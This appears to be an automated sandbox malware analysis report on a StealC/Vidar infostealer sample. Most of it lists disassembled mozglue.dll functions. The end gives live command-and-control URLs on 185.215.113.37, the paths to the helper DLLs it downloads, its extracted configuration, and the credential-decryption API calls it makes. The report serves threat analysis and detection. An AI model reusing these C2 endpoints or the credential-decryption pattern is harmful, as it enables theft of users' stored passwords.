Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 9239613ab886b72bea08c91519fba7f4818e8df3207cc1e6bbf4fa4bc7a4bfb7
Instruction ID: e359f47124981f477c24278c34debfead54a3d439605a3e9bf6165ce81a9e647
Opcode Fuzzy Hash: 9239613ab886b72bea08c91519fba7f4818e8df3207cc1e6bbf4fa4bc7a4bfb7
Instruction Fuzzy Hash: 1FD16E71A04B469FD708CF28C490B99F7E1FF89308F01862DD85987752EB71B9A9CB91

Function 6CBA5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6CBA5D40
EnterCriticalSection.KERNEL32(6CC0F688), ref: 6CBA5D67
__aulldiv.LIBCMT ref: 6CBA5DB4
LeaveCriticalSection.KERNEL32(6CC0F688), ref: 6CBA5DED

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 8f97c4ec28a9f9173a5fc7d1c4167895dd259ed13b078e5db7d3621362c94d6b
Instruction ID: 41387ebfea11e9e362164316aba075f9c715268aa0021d0cdec489f9c661c42a
Opcode Fuzzy Hash: 8f97c4ec28a9f9173a5fc7d1c4167895dd259ed13b078e5db7d3621362c94d6b
Instruction Fuzzy Hash: 30518571F041698FCF08CFA8C854ABEBBB1FB85304F16461DD895A7751C731AA4ACB94

Function 6CB8CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB8CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CB8CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CB8CF4E

Strings

0, xrefs: 6CB8CF30

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: d0b11a3712339d658043a82085a0b4cc4d8f436604e6b409ce7700a3c88f69a0
Instruction ID: c678eb9368550ec272f1388c3cc1503e0fdf7b04b733df0af8923c479367f644
Opcode Fuzzy Hash: d0b11a3712339d658043a82085a0b4cc4d8f436604e6b409ce7700a3c88f69a0
Instruction Fuzzy Hash: EE51F375A002568FCB00CF18C490AAABBB5EF99304F19869DD8595F351D771FD0ACBE0

Function 6CBC6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CBC82BC,?,?), ref: 6CBC649B

Part of subcall function 6CB9CA10: malloc.MOZGLUE(?), ref: 6CB9CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC64A9

Part of subcall function 6CBBFA80: GetCurrentThreadId.KERNEL32 ref: 6CBBFA8D
Part of subcall function 6CBBFA80: AcquireSRWLockExclusive.KERNEL32(6CC0F448), ref: 6CBBFA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC653F
free.MOZGLUE(?), ref: 6CBC655A

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 85bc66c1777c216d554ad759ede33140fd66cced895aa5fa84cf299080b49275
Instruction ID: 8434a21895f3da68fb39b0484de2c70e30925da8d3d9c6347f3167cdb1c27b77
Opcode Fuzzy Hash: 85bc66c1777c216d554ad759ede33140fd66cced895aa5fa84cf299080b49275
Instruction Fuzzy Hash: 31313CB5A047459FD704CF24D884AAEBBF4FF89314F11842EE89A97741DB30E919CB92

Function 6CB9B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CB9B4F5
AcquireSRWLockExclusive.KERNEL32(6CC0F4B8), ref: 6CB9B502
ReleaseSRWLockExclusive.KERNEL32(6CC0F4B8), ref: 6CB9B542
free.MOZGLUE(?), ref: 6CB9B578

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 7ef838ec459db37c73a0f7cc6b33828c0df90077879c5c11bb131d392068f70b
Instruction ID: a851f3360522c9d2cc9554e345066c05b3cae7daa82a3401c080eaeebef1581f
Opcode Fuzzy Hash: 7ef838ec459db37c73a0f7cc6b33828c0df90077879c5c11bb131d392068f70b
Instruction Fuzzy Hash: 9B11DF31A04B81CBD721CF69C410765B3B5FF97318F11971EE88953E01EBB2A5C58795

Function 6CBC3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CB8F20E,?), ref: 6CBC3DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CB8F20E,00000000,?), ref: 6CBC3DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CBC3E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CBC3E0E

Part of subcall function 6CBBCC00: GetCurrentProcess.KERNEL32(?,?,6CB831A7), ref: 6CBBCC0D
Part of subcall function 6CBBCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CB831A7), ref: 6CBBCC16

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 2a29e93d44117debde746672e530d6629af7961a926e9869ee19dd97d4700963
Instruction ID: cd43ed38d4400e6b54837997e7b1ac2555898361e72cd2b0029c21fd6549607f
Opcode Fuzzy Hash: 2a29e93d44117debde746672e530d6629af7961a926e9869ee19dd97d4700963
Instruction Fuzzy Hash: 2CF0F8B1A002086FEB00AB54DC81DEF377DEB46668F050024FE0957741DB36BA6A86F7

Function 6CBD85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CBD85D3

Part of subcall function 6CB9CA10: malloc.MOZGLUE(?), ref: 6CB9CA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CBD8725

Strings

map/set<T> too long, xrefs: 6CBD8720

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 03a7c69a225300ff6c8ec6a2636204c978519dd3c34b3252badf6e38bf87a807
Instruction ID: e7e510a81c954ebefd16492832e662d610c9bbbe11b2238392ebd4d0e497e867
Opcode Fuzzy Hash: 03a7c69a225300ff6c8ec6a2636204c978519dd3c34b3252badf6e38bf87a807
Instruction Fuzzy Hash: D15153746046818FD701CF18C084A5ABBF1BF5A328F1AC19AE8595BB52C336F885CFD2

Function 6CB8BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6CB8BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CB8BE8F

Strings

0, xrefs: 6CB8BE5B

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: cc234b95517bdfa62cdef04cd1b55ddae9d7929313cc5e891393adad431d77d2
Instruction ID: 8c3906318ca11cdc684f771a2af3a927e061b9ac611f51e23c8055999710c9cd
Opcode Fuzzy Hash: cc234b95517bdfa62cdef04cd1b55ddae9d7929313cc5e891393adad431d77d2
Instruction Fuzzy Hash: 27418D7190A785DFC741CF38C881A9FB7E4EF8A348F008A1DF985A7611D731E9598B92

Function 6CBC3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBC3D19
mozalloc_abort.MOZGLUE(?), ref: 6CBC3D6C

Strings

d, xrefs: 6CBC3D58

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: c7a9c6ba7a3fc2d2edf17d3d001f822ded201780eb5a5251546ae30ba6e3b53c
Instruction ID: 8bcdc857842b88ba4a515a66f6d53c551d511238ac22243655dfa68a33741614
Opcode Fuzzy Hash: c7a9c6ba7a3fc2d2edf17d3d001f822ded201780eb5a5251546ae30ba6e3b53c
Instruction Fuzzy Hash: 2111BF35F046989BDB008F69D8144EEB775EF86318B85821DE8959B602EB31A5C4C792

Function 6CBE6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CBE6E22
__Init_thread_footer.LIBCMT ref: 6CBE6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6CBE6E1D

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 1756c842436f6700c5f086ac2bdb32380511da54278e6a2090137378c576e54a
Instruction ID: 03a361e6072ccdeaa5e810da250a5b4944f9d7dc1c540366fef5478e2b6c5e9d
Opcode Fuzzy Hash: 1756c842436f6700c5f086ac2bdb32380511da54278e6a2090137378c576e54a
Instruction Fuzzy Hash: DAF05930B482C4CFDA10CB68C860AA57772D31B658F05016DC51146BD1DB73E586CE97

Function 6CB99E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6CB99EEF

Strings

Infinity, xrefs: 6CB99EB7
NaN, xrefs: 6CB99EC1

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: 4ab81909452f77ac9a7327f1fcf560a9498de4b9a2f6f1c65285b4931e369b05
Instruction ID: a13183bb6d76e7bb3780aae1c50642d41ac70be4a4545a33b52b623dec0a05af
Opcode Fuzzy Hash: 4ab81909452f77ac9a7327f1fcf560a9498de4b9a2f6f1c65285b4931e369b05
Instruction Fuzzy Hash: B2F0AF70B04781CFDB00CF58D84575033B1B307708F220AACC5140AB41E77765CACA8A

Function 6CB9BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6CB9BEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6CB9BEF5

Strings

cryptbase.dll, xrefs: 6CB9BEF0

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: c0b2abc9c402d59ff2b2d6297cc756dbfff1bf86b4ac6bce6d30a439d778cfac
Instruction ID: 5add103bbc0d61eb31fcaec93b0f0c93983f26043bee4dabe914166a7b3d244b
Opcode Fuzzy Hash: c0b2abc9c402d59ff2b2d6297cc756dbfff1bf86b4ac6bce6d30a439d778cfac
Instruction Fuzzy Hash: F2D0A731380908E6C610EB508C09F163B7C9702715F10C434F32544991C7B29410CF50

Function 6CBDB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CBDB2C9,?,?,?,6CBDB127,?,?,?,?,?,?,?,?,?,6CBDAE52), ref: 6CBDB628

Part of subcall function 6CBD90E0: free.MOZGLUE(?,00000000,?,?,6CBDDEDB), ref: 6CBD90FF
Part of subcall function 6CBD90E0: free.MOZGLUE(?,00000000,?,?,6CBDDEDB), ref: 6CBD9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CBDB2C9,?,?,?,6CBDB127,?,?,?,?,?,?,?,?,?,6CBDAE52), ref: 6CBDB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CBDB2C9,?,?,?,6CBDB127,?,?,?,?,?,?,?,?,?,6CBDAE52), ref: 6CBDB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CBDB127,?,?,?,?,?,?,?,?), ref: 6CBDB74D

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: a79fb66cbf6d801432fdc24e02bda7fbb7972e3d6ac47fb167064b006ed43afb
Instruction ID: 2800976509d3ff409230330e63f3cd79e75c7e935f0636fb7ebf2ecdfb96ebbd
Opcode Fuzzy Hash: a79fb66cbf6d801432fdc24e02bda7fbb7972e3d6ac47fb167064b006ed43afb
Instruction Fuzzy Hash: A451BF71A052568FDB14CF58C98076EB7B5FF85304F56852DD85AAB710DB31F804CBA2

Function 6CBEB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CB90A4D), ref: 6CBEB5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CB90A4D), ref: 6CBEB623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CB90A4D), ref: 6CBEB66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6CB90A4D), ref: 6CBEB67F

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 7386c6cc5eca1c7eaee1e170cb5513db5f4658e01a4a169efb7f52ca33b73cdf
Instruction ID: d8b3fe1775fee77d29251c1207cf46239916df99ee7104d4402be0593941a8db
Opcode Fuzzy Hash: 7386c6cc5eca1c7eaee1e170cb5513db5f4658e01a4a169efb7f52ca33b73cdf
Instruction Fuzzy Hash: 5531E471A013168FEB10CF58C84465AFBF6FF89744F16866AC8069B301EB31E915CBE6

Function 6CBBF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6CBBF611
memcpy.VCRUNTIME140(?,?,?), ref: 6CBBF623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6CBBF652
memcpy.VCRUNTIME140(?,?,?), ref: 6CBBF668

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: 4ad0e51eda6bee857f241df86ef378d2a0f34c533a28f2cb06736d53191b04d3
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: E2316175A00254AFC724CF5DCDC0AAF77B5EB84354B148538FA4A8BB09DB71ED858B90

Function 6CBD26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBD26C1
free.MOZGLUE(?), ref: 6CBD26E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBD26FF
free.MOZGLUE ref: 6CBD270D

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d60aafa292f025526df834467c6dbf9fa4751f34637a8b15a9d43864dc900bc2
Instruction ID: af7e0a7b88ea5398ae54c686a07b52454edaa958daa043f113eaa68fb1c7b67a
Opcode Fuzzy Hash: d60aafa292f025526df834467c6dbf9fa4751f34637a8b15a9d43864dc900bc2
Instruction Fuzzy Hash: 98F0D6B27012C05BE7109A58D88494BB3A9EB5121CB124035FA1AC3B01E332FD19C6A7

Source: http://185.215.113.37/	Avira URL Cloud: Label: malware
Source: http://185.215.113.37	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll/~	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll5	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpp	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpq	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dlla	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phps	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpe	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpj	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phption:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpM	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpinomi	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpY	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpA	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpW	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpbird	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php3	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dllE	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpimple-storage.jsonl	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpwser	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpKKJJKJEGIECAKJJEB	Avira URL Cloud: Label: malware

Source: 0.2.file.exe.3c0000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: 0.2.file.exe.3c0000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003C9B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_003C9B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CC820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_003CC820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003C7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_003C7240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003C9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_003C9AC0
